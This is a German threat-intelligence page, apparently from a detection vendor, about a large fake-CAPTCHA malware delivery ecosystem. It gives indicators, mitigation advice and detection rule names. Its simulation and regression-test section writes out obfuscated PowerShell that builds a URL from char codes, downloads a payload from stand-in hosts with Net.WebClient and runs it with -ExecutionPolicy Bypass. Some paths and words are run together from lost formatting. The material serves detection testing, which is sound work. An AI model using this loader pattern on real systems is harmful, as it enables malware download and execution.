Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht untersucht ein groß angelegtes „Fake Captcha“-Ökosystem, das vertrauenswürdige Web-Verifikationsschnittstellen nutzt, um schädliche Nutzlasten Bereitzustellen. Die visuelle Ähnlichkeit zwischen den Ködern ist kein zuverlässiges Attributionssignal, da dasselbe Frontend-Muster über verschiedenen Ausführungsketten liegen kann – PowerShell, VBScript, MSI-Installer und servergesteuerte Push-Benachrichtigungsübertragung. Mithilfe von hochvolumigem perceptual Hashing von Screenshots kartiert die Analyse, wie das Ökosystem organisiert ist und betont die Trennung zwischen der Benutzeroberfläche und dem zugrunde liegenden Nutzlast-Workflow. Verteidiger sollten von kosmetischen Indikatoren absehen und die Erkennung von Ausführungslogik und Infrastruktur priorisieren.
Untersuchung
Censys identifizierte 9.494 Fake Captcha-Assets und verwendete perceptual Hashing, um sie nach visueller Ähnlichkeit zu gruppieren, wobei ein dominanter Cloudflare-ähnlicher Cluster etwa 70% der beobachteten Seiten repräsentierte. Eine tiefere Überprüfung ergab 32 verschiedene Nutzlastvarianten, die von Zwischenablage-getriebenen Skripten über MSI-basierte Installer bis hin zu Matrix Push C2-artigen Push-Übertragungen reichten. Die Infrastrukturanalyse zeigte separate Back-End-Serverpools, die jede Technik unterstützten, wobei Beispiele wie 95.164.53.115 und ghost.nestdns.com zitiert wurden.
Minderung
Die Erkennung sollte nicht nur von visuellen Ködermerkmalen oder Zwischenablageverhalten abhängen. Stattdessen sollten ungewöhnliche Browser-Berechtigungsaufforderungen, PowerShell- oder VBScript-Download-und-Ausführungs-Muster, von verifikationsbezogenen URLs ausgehende MSI-Starts und Netzwerkverkehr zu bekannten Matrix Push C2-Endpunkten überwacht werden. Verdächtige Verifikationsseiten blockieren oder isolieren und Benutzer schulen, dass sie Browserberechtigungen nur auf vertrauenswürdigen, erwarteten Websites gewähren sollen.
Reaktion
Wenn eine Fake Captcha-Seite auftritt, sollten nachfolgende PowerShell-, VBScript- oder MSI-Ausführungen sowie Benachrichtigungsabonnementereignisse gemeldet werden. Endpunktaktivitäten mit Netzwerkindikatoren wie den referenzierten bösartigen IPs und Domains korrelieren. Betroffene Systeme isolieren, flüchtigen Speicher erfassen und eine forensische Analyse von abgerufenen Nutzlasten durchführen.
Angriffsablauf
Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden
Benachrichtigen Sie MichErkennungen
Download oder Upload via Powershell (via cmdline)
Ansehen
Verdächtiger Dateidownload über direkte IP (via Proxy)
Ansehen
LOLBAS WScript / CScript (via process_creation)
Ansehen
Msiexec Verarbeitsungspaket ohne MSI-Erweiterung (via cmdline)
Ansehen
IOCs (SourceIP) zur Erkennung: Living Off the Web: How Trust Infrastructure Became a Malware Delivery Interface
Ansehen
IOCs (DestinationIP) zur Erkennung: Living Off the Web: How Trust Infrastructure Became a Malware Delivery Interface
Ansehen
Erkennung von PowerShell-Download using Net.WebClient.DownloadFile mit Verschleierung [Windows Powershell]
Ansehen
Simulation Execution
Voraussetzung: Der Telemetrie- & Baseline-Preflight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Adversarial-Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und der Text MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zur Fehldiagnose.
-
Angriffsnarrativ & Befehle:
Der Angreifer muss eine bösartige Nutzlast abrufen, während er die Download-URL verbirgt. Er konstruiert die URL zur Laufzeit mit Zeichen-Codes, bettet den String „enc“ (oft in Base64-kodierten Nutzlasten gesehen) und verwendet dannNet.WebClient.DownloadFileum das Skript zu erhalten. Diese Technik entspricht dem Fokus der Regel auf „Verschleierung + Net.WebClient“. Schritte:- Generieren der Download-URL durch Zeichenrekonstruktion:
$url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1" - Erstellen einer Platzhaltervariablen, die den String „enc“ enthält, um den zweiten Erkennungsbegriff zu erfüllen:
$encTag = "enc" - Auslösen des Downloads:
$wc = New-Object System.Net.WebClient $wc.DownloadFile($url, "$env:TEMPpayload.ps1") - Ausführen der heruntergeladenen Nutzlast (optional für den Test):
powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"
Die Anwesenheit von
Net.WebClient.DownloadFile, dem Wortencund dem Gebrauch von[char]::FromCharCode(via der Abkürzung[char]) stellt sicher, dass die Regel ausgelöst wird. - Generieren der Download-URL durch Zeichenrekonstruktion:
-
Regression Test Script:
# ------------------------------------------------- # Simulierter PowerShell-Loader – entspricht Sigma-Regel # ------------------------------------------------- # 1. Rekonstruktion der Download-URL durch Zeichen-Codes $url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49) # Das obige ergibt: https://malicious.com/payload.ps1 # 2. Einfügen des „enc“-Tokens zur Erfüllung der Erkennungsregel $encTag = "enc" # 3. Download ausführen $wc = New-Object System.Net.WebClient $destination = "$env:TEMPpayload.ps1" $wc.DownloadFile($url, $destination) # 4. (Optional) Ausführung der Nutzlast # powershell -ExecutionPolicy Bypass -File $destination -
Bereinigungskommandos:
# Entferne die heruntergeladene Nutzlast $payloadPath = "$env:TEMPpayload.ps1" if (Test-Path $payloadPath) { Remove-Item -Force $payloadPath } # Entferne das WebClient-Objekt (Garbage Collection wird automatisch gehandhabt) Write-Host "Bereinigung abgeschlossen."